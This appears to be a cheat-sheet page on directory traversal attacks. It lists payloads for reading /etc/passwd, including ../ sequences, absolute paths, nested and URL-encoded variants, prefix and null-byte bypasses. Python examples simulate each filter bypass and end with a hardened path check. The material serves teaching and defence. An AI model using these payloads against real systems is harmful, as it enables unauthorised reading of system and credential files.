Directory traversal

A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.

-- Wikipedia


Traversal sequence (dot dot slash)

Each ../ steps up one directory. Repeat it until you reach the root directory, then build up the path to the desired file from there, e.g. ../../../etc/passwd when the base directory is three levels deep. If you do not know the depth, supply more ../ than needed: once you are at / a further .. stays at /, so surplus sequences are harmless.


Absolute path

Sometimes you can just supply an absolute path, e.g. /etc/passwd. This works when the app passes the filename to the file system API without prepending a base directory, or when its path-joining function discards the base as soon as the user-supplied part is absolute (Python's os.path.join behaves this way).
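How a naive base-directory-plus-filename concatenation resolves the inputs from the two sections above, as an added Python example that is not part of the original page. The base directory /var/www/images is an assumption and nothing is opened on disk; posixpath.normpath reproduces the kernel's handling of .. components so the result is the same on any host.

```python
import posixpath

# Constructed example: BASE_DIR is an assumed document root, nothing is opened.
BASE_DIR = "/var/www/images"


def vulnerable_path(filename: str) -> str:
    """Mimics an application that appends the user-supplied filename to its
    base directory and hands the result to the filesystem. posixpath.join
    discards BASE_DIR when `filename` is absolute, and posixpath.normpath
    collapses '..' the way the OS does, dropping any '..' that would climb
    above '/'."""
    return posixpath.normpath(posixpath.join(BASE_DIR, filename))


def steps_to_root(base: str) -> int:
    """Number of '../' needed to climb from `base` to '/'."""
    return len([component for component in base.split("/") if component])


if __name__ == "__main__":
    samples = [
        "cat.png",                               # intended use
        "../../../etc/passwd",                   # exactly three steps up
        "../../../../../../../../etc/passwd",    # surplus '..' at '/' are ignored
        "/etc/passwd",                           # absolute path replaces the base
    ]
    for sample in samples:
        print(f"{sample!r:45} -> {vulnerable_path(sample)!r}")
    print("steps to root from", BASE_DIR, "=", steps_to_root(BASE_DIR))
```

The third sample is the reason the "just use plenty of ../" advice is safe: after the stack of directory components is empty, every further .. is discarded rather than causing an error. The fourth sample shows why an absolute path alone can be enough.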


Bypass filters

Nested traversal sequences

When the traversal sequence is stripped only once rather than recursively, nest the sequences so that a traversal sequence survives the stripping: ....// becomes ../ once the inner ../ is removed, so ....//....//....//etc/passwd is turned into ../../../etc/passwd by the filter itself. ..././ collapses to ../ under the same filter and is a useful alternative.


URL encoding

Single URL encoding: ../ becomes %2e%2e%2f (partial variants such as ..%2f or %2e%2e/ also exist). This works when the filter inspects the raw parameter but the server or framework decodes it before the file is opened.


Double URL encoding, where the %-character is itself encoded as %25, so ../ becomes %252e%252e%252f. This works when the input is decoded twice, e.g. once by the web server and again by the application, with the filter running in between and therefore seeing only %2e%2e%2f.


Non-standard encodings, e.g. the overlong UTF-8 slash ..%c0%af and the fullwidth slash ..%ef%bc%8f, which some decoders normalise to ../ after the filter has run. Against Windows targets also try the backslash form ..\ and its encoding %2e%2e%5c.


Mandatory prefix

If the app only checks that the supplied path starts with a specific prefix, e.g. /var/www/images/, you can keep the prefix and append traversal sequences after it: /var/www/images/../../../etc/passwd passes the check and still resolves to /etc/passwd.


Null byte termination

E.g. if the app checks for certain file extensions, you may be able to bypass the filter by supplying a null byte (%00) in front of the required extension, e.g. ../../../etc/passwd%00.png. The extension check sees the .png, but a runtime that hands the string to a C file API stops at the null byte and opens /etc/passwd. Current PHP, Java and Python reject paths with embedded null bytes, so this mainly works against older software.
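The filters described under "Bypass filters", one bypass against each, and the check that stops all of them, as an added Python example that is not part of the original page. The filter functions are models of the behaviour described above rather than code from any real application; BASE_DIR is an assumption and no file is opened.

```python
import posixpath
import urllib.parse

# Constructed example: BASE_DIR is an assumed document root, nothing is opened.
BASE_DIR = "/var/www/images"


def os_resolve(path: str) -> str:
    """The path the filesystem API finally sees once '..' components are
    collapsed. posixpath keeps the example deterministic offline."""
    return posixpath.normpath(path)


# --- naive filters modelled after the ones the page describes -------------

def strip_traversal_once(filename: str) -> str:
    """Removes '../' in a single pass; str.replace does not re-scan its output."""
    return filename.replace("../", "")


def raw_input_contains_traversal(raw: str) -> bool:
    """Blocklist applied to the still URL-encoded request parameter."""
    return "../" in raw


def has_expected_prefix(path: str) -> bool:
    """Accepts anything that starts with the base directory, without normalising."""
    return path.startswith(BASE_DIR + "/")


def has_allowed_extension(path: str) -> bool:
    """Extension check on the whole string the user supplied."""
    return path.endswith(".png")


def c_string_truncate(path: str) -> str:
    """Models an older runtime handing the path to a C API: everything after
    the first NUL byte is dropped. Current PHP, Java and Python reject
    embedded NULs instead."""
    return path.split("\x00", 1)[0]


# --- one bypass per filter; each returns the path the OS would open --------

def bypass_nested_sequences() -> str:
    payload = "....//....//....//etc/passwd"
    filtered = strip_traversal_once(payload)      # filter yields ../../../etc/passwd
    return os_resolve(posixpath.join(BASE_DIR, filtered))


def bypass_single_url_encoding() -> str:
    payload = "%2e%2e%2f" * 3 + "etc/passwd"
    if raw_input_contains_traversal(payload):     # filter runs before decoding
        return "blocked"
    decoded = urllib.parse.unquote(payload)       # framework decodes afterwards
    return os_resolve(posixpath.join(BASE_DIR, decoded))


def bypass_double_url_encoding() -> str:
    payload = "%252e%252e%252f" * 3 + "etc/passwd"
    once = urllib.parse.unquote(payload)          # web server decodes: %2e%2e%2f...
    if raw_input_contains_traversal(once):        # filter sees no '../'
        return "blocked"
    twice = urllib.parse.unquote(once)            # application decodes again: ../...
    return os_resolve(posixpath.join(BASE_DIR, twice))


def bypass_mandatory_prefix() -> str:
    payload = BASE_DIR + "/../../../etc/passwd"
    if not has_expected_prefix(payload):
        return "blocked"
    return os_resolve(payload)


def bypass_null_byte() -> str:
    payload = "../../../etc/passwd%00.png"
    decoded = urllib.parse.unquote(payload)       # '../../../etc/passwd\x00.png'
    if not has_allowed_extension(decoded):
        return "blocked"
    return os_resolve(posixpath.join(BASE_DIR, c_string_truncate(decoded)))


# --- the hardened check: decide on the fully resolved path, not on patterns --

def safe_resolve(user_supplied: str):
    """Returns the resolved path if it stays inside BASE_DIR, else None.
    Production code should call os.path.realpath on the joined path so
    symlinks are resolved as well; normpath is used here to stay offline."""
    decoded = urllib.parse.unquote(user_supplied)
    if "\x00" in decoded:
        return None
    candidate = os_resolve(posixpath.join(BASE_DIR, decoded))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for bypass in (bypass_nested_sequences, bypass_single_url_encoding,
                   bypass_double_url_encoding, bypass_mandatory_prefix,
                   bypass_null_byte):
        print(f"{bypass.__name__:28} -> {bypass()}")
    for attempt in ("cat.png", "../../../etc/passwd", "/etc/passwd",
                    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
                    "../../../etc/passwd%00.png"):
        print(f"safe_resolve({attempt!r}) -> {safe_resolve(attempt)!r}")
```

Every bypass exists because the filter reasons about the input string while the OS reasons about the resolved path. safe_resolve closes the gap by decoding, rejecting null bytes, resolving, and only then comparing against the base directory with commonpath (a plain startswith would accept /var/www/images-old/). Note that the nested payload ....//....//....//etc/passwd is harmless to safe_resolve: with no stripping step, .... is just an odd directory name inside the base.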

